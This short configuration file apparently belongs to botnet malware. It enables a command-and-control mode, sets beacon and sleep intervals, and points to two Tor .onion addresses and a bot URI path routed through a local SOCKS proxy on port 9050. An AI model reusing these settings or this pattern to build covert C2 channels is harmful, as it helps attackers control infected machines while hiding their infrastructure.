config.commandandconquerStatus=true
config.pingdelay = 2000
config.sleeptime = 20000

#005myvt.nwsvr1.com
config.dnsonion=wmejqk6hu7a2uwcm.onion
config.urirequest=/ciaosonounbot
config.botonion=vidarnl3jr45kk3r.onion

config.requestTimeout=600000
config.connectTimeout=600000
config.readTimeout=600000

config.socksProxyHost=127.0.0.1
config.socksProxyPort=9050
